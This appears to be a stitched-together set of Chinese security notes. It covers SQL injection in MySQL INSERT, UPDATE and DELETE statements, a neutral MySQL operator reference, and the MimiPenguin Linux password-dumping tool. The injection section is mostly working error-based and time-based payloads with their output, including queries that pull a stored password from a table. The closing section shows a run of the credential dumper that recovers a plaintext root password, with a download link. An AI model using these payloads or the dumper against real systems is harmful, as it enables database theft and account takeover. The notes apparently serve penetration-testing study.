insert


这里我们用updatexml来演示
使用逻辑运算符(and or xor && ||)

mysql> insert into users values (3,'name' xor updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (5,'name' and updatexml(2,concat(0x7e,(version())),0) and '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

使用算数运算符(+ – * /)

mysql> insert into users values (3,'name'+updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (3,'name'*updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

使用位运算符连接(| &)

mysql> insert into users values (3,'name'&updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'
mysql> insert into users values (3,'name'|updatexml(2,concat(0x7e,(version())),0) xor '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

update


mysql> update users set username = 'name' and updatexml(2,concat(0x7e,(version())),0) and '' where id = 5;
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

delete


mysql> delete from users where id = 5 or updatexml(2,concat(0x7e,(version())),0) or '';
ERROR 1105 (HY000): XPATH syntax error: '~5.5.40-log'

 

这里需要注意,insert和delete都可以读取当前表的数据,但是update不行,因为在update的子查询中不能出现相同的表名。
使用insert获取当前表的数据,如下:

mysql> insert into users values (5,'name' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) from users limit 0,1)),0) or '','pass');
ERROR 1105 (HY000): XPATH syntax error: '~1~0~root@localhost'

使用delete获取当前表的数据,如下:

mysql> delete from users where id = 5 or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) fromusers limit 0,1)),0);
ERROR 1105 (HY000): XPATH syntax error: '~1~0~root@localhost'

而使用update获取不到,如下:

mysql> update users set username = 'test' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) from users limit 0,1)),0) where id = 5;
ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause

这里可以使用:

mysql> update users set username = 'test' or updatexml(2,concat(0x7e,(select concat_ws(0x7e,id,username,password) f
rom (select * from users)xx limit 0,1)),0) where id = 5;
ERROR 1105 (HY000): XPATH syntax error: '~1~test~root@localhost'

或者用主键重复的报错注入也可以

mysql> update users set username = 'test' and (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat_ws(0x7e,id,username,password) FROM users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) and '' where id = 5;
ERROR 1062 (23000): Duplicate entry '1~0~root@localhost1' for key 'group_key'

当然我们之前也介绍过报错注入的姿势,用其他的报错语句同样可以达到效果。

参考文章


http://static.hx99.net/static/drops/tips-2078.html

测试表结构如下:

mysql> select * from users;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | 0 | root@localhost |
| 2 | 0 | 123456 |
+----+----------+----------------+
2 rows in set (0.00 sec)

insert


使用逻辑运算符(and or xor && ||)连接如下:
需要注意如果使用And或者&&的话,这里分为两种情况
1)存在注入的字段为字符型。

insert : insert into users values (1,'{injecthere}','password');

那么逻辑运算符不能使用and和&&,可以使用or || xor , 因为字符型在进行逻辑运算时会当做0来处理,所以无法执行and后的sleep。

mysql> insert into users values (5,'name' and sleep(2),'pass');
Query OK, 1 row affected, 1 warning (0.00 sec)

可以看到没有延迟。

2)存在注入的字段为Int型。

insert into users values ({injecthere},'Vinc','password');

这里可以使用and && || or xor。
需要注意如果逻辑运算符使用And或者&&,那么注入的数不能为0。

mysql> insert into users values (-1 and sleep(2),'vinc','password');
Query OK, 1 row affected (2.00 sec)

可以看到延迟2S。

mysql> insert into users values (0 and sleep(2),'vinc','password');
Query OK, 1 row affected (0.00 sec)

可以看到没有延迟。

一般建议使用or || xor测试

mysql> insert into users values (18,'vinc' xor sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)

 

使用算数运算符(+ – * /)连接如下

mysql> insert into users values (4,'name'+sleep(2),'pass');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> insert into users values (8,'name'*sleep(2),'pass');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> select * from users where id = 8 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 8 | 0 | pass |
+----+----------+----------+
1 row in set (0.00 sec)

这里插入的username为0

 

使用位运算符连接(| &)如下

mysql> insert into users values (12,'vinc' | sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)
mysql> insert into users values (13,'vinc' & sleep(2),'password');
Query OK, 1 row affected, 1 warning (2.00 sec)

update


和insert的用法相同。

update users set username = '{injecthere}' where id = 1;

mysql> update users set password = 'Vinc' or sleep(2) where id = 4;
Query OK, 0 rows affected, 1 warning (2.00 sec)
Rows matched: 1 Changed: 0 Warnings: 1
mysql> update users set password = 'Vinc' or if(ord(substr(version()from(1)for(1)))=53,sleep(2),1) where id = 4;
Query OK, 0 rows affected, 1 warning (2.00 sec)
Rows matched: 1 Changed: 0 Warnings: 1

delete


delete : delete from users where id > {injecthere} ;

delete的注入位置位于where后所以和select是一样的。

mysql> delete from users where id = 5 and sleep(2);
Query OK, 0 rows affected (2.00 sec)

因为sleep()函数返回0,所以这里无法删除成功。

参考文章


https://osandamalith.com/2017/03/13/mysql-blind-injection-in-insert-and-update-statements/

算数运算符



mysql> select 1+2;

mysql> select 2-1;

mysql> select 2*3;

mysql> select 5/3;

mysql> SELECT 5 DIV 2;

mysql> select 5%2,mod(5,2);

比较运算符


等于
mysql> select 1=0,1=1,null=null;
不等于
mysql> select 1<>0,1<>1,null<>null;
安全等于
mysql> select 1<=>1,2<=>0,0<=>0,null<=>null;
小于
mysql> select ‘a'<‘b’,’a'<‘a’,’a'<‘c’,1<2;
小于等于
mysql> select ‘bdf'<=’b’,’b'<=’b’,0<1;
大于
mysql> select ‘a’>’b’,’abc’>’a’,1>0;
大于等于
mysql> select ‘a’>=’b’,’abc’>=’a’,1>=0,1>=1;
BETWEEN
mysql> select 10 between 10 and 20, 9 between 10 and 20;
IN
mysql> select 1 in (1,2,3), ‘t’ in (‘t’,’a’,’b’,’l’,’e’), 0 in (1,2);
IS NULL
mysql> select 0 is null,null is null;
IS NOT NULL
mysql> select 0 is not null, null is not null;
LIKE
mysql> select 123456 like ‘123%’, 123456 like ‘%123%’, 123456 like ‘%321%’;
REGEXP
mysql> select ‘abcdef’ regexp ‘ab’, ‘abcdefg’ regexp ‘k’;

逻辑运算符



mysql> select not 0, not 1, not null;
mysql> select ! 0, ! 1, ! null;

mysql> select (1 and 1), (0 and 1), (3 and 1), (1 and null);
mysql> select (1 && 1), (0 && 1), (3 && 1), (1 && null);

mysql> select (1 or 0), (0 or 0), (1 or null), (1 or 1), (null or null);
mysql> select (1 || 0), (0 || 0), (1 || null), (1 || 1), (null || null);
异或
mysql> select (1 xor 1), (0 xor 0), (1 xor 0), (0 xor 1), (null xor 1);
两者满足其一,不同时满足。

位运算符


位与
mysql> select 2&3;
mysql> select 2&3&4;
参加运算的两个数据,按二进制位进行“与”运算。
运算规则:0&0=0; 0&1=0; 1&0=0; 1&1=1;
即:两位同时为“1”,结果才为“1”,否则为0
例如:3&5 即 0000 0011 & 0000 0101 = 0000 0001 因此,3&5的值得1。

位或
mysql> select 2|3;
参加运算的两个对象,按二进制位进行“或”运算。
运算规则:0|0=0; 0|1=1; 1|0=1; 1|1=1;
即 :参加运算的两个对象只要有一个为1,其值为1。
例如:3|5 即 0000 0011 | 0000 0101 = 0000 0111 因此,3|5的值得7。

位异或
mysql> select 2^3;
参加运算的两个数据,按二进制位进行“异或”运算。
运算规则:0^0=0; 0^1=1; 1^0=1; 1^1=0;
即:参加运算的两个对象,如果两个相应位为“异”(值不同),则该位结果为1,否则为0。

位取反
mysql> select ~0;
+———————-+
| ~0 |
+———————-+
| 18446744073709551615 |
+———————-+
1 row in set (0.00 sec)

位右移
mysql> select 100>>3;
将一个运算对象的各二进制位全部右移若干位,a >> 2 将a的二进制位右移2位,右边丢弃。
mysql> select 9 >> 2 ;
+——–+
| 9 >> 2 |
+——–+
| 2 |
+——–+
1 row in set (0.00 sec)

位左移
mysql> select 100<<3;
将一个运算对象的各二进制位全部左移若干位,a << 2 将a的二进制位左移2位,右补0。
mysql> select 3 << 2 ;
+——–+
| 3 << 2 |
+——–+
| 12 |
+——–+
1 row in set (0.00 sec)

运算符优先级顺序


最高优先级 :=
1 ||, OR, XOR
2 &&, AND
3 BETWEEN, CASE, WHEN, THEN, ELSE
4 =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
5 |
6 &
7 <<, >>
8 -, +
9 *, /, DIV, %, MOD
10 ^
11 – (unary minus), ~ (unary bit inversion)
12 !, NOT
最低优先级 BINARY, COLLATE

从当前的登录的Linux桌面用户Dump密码,与Windows下工具mimikatz类似。
前提是需要Root权限。
测试通过的系统:

Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions) [Gcore dependency]
openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)

在Kali下测试

root@kali-vincent:/tmp# uname -a
Linux kali-vincent 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@kali-vincent:/tmp# ./pass.sh 
007ca000-0088a000
7f86970e4000-7f86978e4000
7f86978e5000-7f86980e5000
7fff18c61000-7fff18c82000
7f33ef00f000-7f33ef019000
7f33ef218000-7f33ef219000
7f33ef219000-7f33ef21a000
7f33ef21a000-7f33ef21d000
7f33ef41c000-7f33ef41d000
7f33ef41d000-7f33ef41e000
7f33ef41e000-7f33ef423000
7f33ef622000-7f33ef623000
7f33ef623000-7f33ef624000
7f33ef624000-7f33ef626000
7f33ef825000-7f33ef826000
7f33ef826000-7f33ef827000
7f33ef827000-7f33ef828000
7f33efa28000-7f33efa29000
7f33efa29000-7f33efa2a000
7f33efa2a000-7f33efa2e000
7f33efc2d000-7f33efc2e000
7f33efc2e000-7f33efc2f000
7f33efc2f000-7f33efc32000
7f33efe31000-7f33efe32000
7f33efe32000-7f33efe33000
7f33efe33000-7f33efe3a000
7f33f0039000-7f33f003a000
7f33f003a000-7f33f003b000
7f33f003b000-7f33f003f000
7f33f023e000-7f33f023f000
7f33f023f000-7f33f0240000
7f33f0240000-7f33f0274000
7f33f0473000-7f33f0476000
7f33f0476000-7f33f0477000
7f33f0477000-7f33f0479000
7f33f0678000-7f33f0679000
7f33f0679000-7f33f067a000
7f33f067a000-7f33f067c000
7f33f087b000-7f33f087c000
7f33f087c000-7f33f087d000
7f33f087d000-7f33f0881000
7f33f0a80000-7f33f0a81000
7f33f0a81000-7f33f0a82000
7f33f0a82000-7f33f0a83000
7f33f0c83000-7f33f0c84000
7f33f0c84000-7f33f0c85000
7f33f0c85000-7f33f0c86000
7f33f0e85000-7f33f0e86000
7f33f0e86000-7f33f0e87000
7f33f0e87000-7f33f0e88000
7f33f1087000-7f33f1088000
7f33f1088000-7f33f1089000
7f33f1089000-7f33f1097000
7f33f1296000-7f33f1297000
7f33f1297000-7f33f1298000
7f33f1298000-7f33f12a4000
7f33f12a4000-7f33f12a9000
7f33f14a8000-7f33f14a9000
7f33f14a9000-7f33f14aa000
7f33f14aa000-7f33f14ac000
7f33f16ab000-7f33f16ac000
7f33f16ac000-7f33f16ad000
7f33f16ad000-7f33f16b0000
7f33f18af000-7f33f18b0000
7f33f18b0000-7f33f18bb000
7f33f1aba000-7f33f1abb000
7f33f1abb000-7f33f1abc000
7f33f1abc000-7f33f1ac6000
7f33f1cc5000-7f33f1cc6000
7f33f1cc6000-7f33f1cc7000
7f33f1cc7000-7f33f1cce000
7f33f1ecd000-7f33f1ece000
7f33f1ece000-7f33f1ecf000
7f33f1ecf000-7f33f1ee7000
7f33f20e6000-7f33f20e7000
7f33f20e7000-7f33f20e8000
7f33f20e8000-7f33f20ec000
7f33f20ec000-7f33f2100000
7f33f22ff000-7f33f2300000
7f33f2300000-7f33f2301000
7f33f2301000-7f33f2303000
7f33f2303000-7f33f2306000
7f33f2505000-7f33f2506000
7f33f2506000-7f33f2507000
7f33f2507000-7f33f2512000
7f33f2711000-7f33f2712000
7f33f2712000-7f33f2713000
7f33f2713000-7f33f2741000
7f33f2940000-7f33f2942000
7f33f2942000-7f33f2943000
7f33f2943000-7f33f2944000
7f33f2944000-7f33f29b0000
7f33f2bb0000-7f33f2bb1000
7f33f2bb1000-7f33f2bb2000
7f33f2bb2000-7f33f2bb5000
7f33f2db4000-7f33f2db5000
7f33f2db5000-7f33f2db6000
7f33f2db6000-7f33f2dd0000
7f33f2fcf000-7f33f2fd1000
7f33f2fd1000-7f33f2fd2000
7f33f2fd2000-7f33f2fdc000
7f33f2fdc000-7f33f2ff1000
7f33f31f0000-7f33f31f1000
7f33f31f1000-7f33f31f2000
7f33f31f2000-7f33f31f4000
7f33f31f4000-7f33f3393000
7f33f3593000-7f33f3597000
7f33f3597000-7f33f3599000
7f33f3599000-7f33f359d000
7f33f359d000-7f33f35a0000
7f33f379f000-7f33f37a0000
7f33f37a0000-7f33f37a1000
7f33f37a1000-7f33f3865000
7f33f3a65000-7f33f3a72000
7f33f3a72000-7f33f3a75000
7f33f3a75000-7f33f3abb000
7f33f3cbb000-7f33f3cbd000
7f33f3cbd000-7f33f3cbf000
7f33f3cbf000-7f33f3cc7000
7f33f3ec6000-7f33f3ec7000
7f33f3ec7000-7f33f3ec8000
7f33f3ec8000-7f33f3ef6000
7f33f3ef6000-7f33f3f10000
7f33f410f000-7f33f4110000
7f33f4110000-7f33f4111000
7f33f4111000-7f33f4113000
7f33f4312000-7f33f4313000
7f33f4313000-7f33f4314000
7f33f4314000-7f33f44df000
7f33f46df000-7f33f46fc000
7f33f46fc000-7f33f470c000
7f33f470c000-7f33f470f000
7f33f470f000-7f33f4730000
7f33f4930000-7f33f4931000
7f33f4931000-7f33f4932000
7f33f4932000-7f33f4934000
7f33f4934000-7f33f4941000
7f33f4b41000-7f33f4b42000
7f33f4b42000-7f33f4b43000
7f33f4b43000-7f33f4b4c000
7f33f4d4b000-7f33f4d4c000
7f33f4d4c000-7f33f4d4d000
7f33f4d4d000-7f33f4d4e000
7f33f4d4e000-7f33f4d6e000
7f33f4e2e000-7f33f4f6e000
7f33f4f6e000-7f33f4f6f000
7f33f4f6f000-7f33f4f70000
7f33f4f70000-7f33f4f71000
7f33f4f71000-7f33f502d000
7f33f50c1000-7f33f5201000
7f33f5201000-7f33f520c000
7f33f522b000-7f33f522d000
7f33f522d000-7f33f5230000
7f33f5230000-7f33f5231000
7f33f5231000-7f33f523b000
7f33f62f9000-7f33f6342000
7ffefa8f0000-7ffefa911000
7ffefa950000-7ffefa952000
7ffefa952000-7ffefa954000
ffffffffff600000-ffffffffff601000
MimiPenguin Results:
[SYSTEM - GNOME] root:hehe123

下载地址:https://github.com/huntergregal/mimipenguin


参考文章:http://www.freebuf.com/sectool/131165.html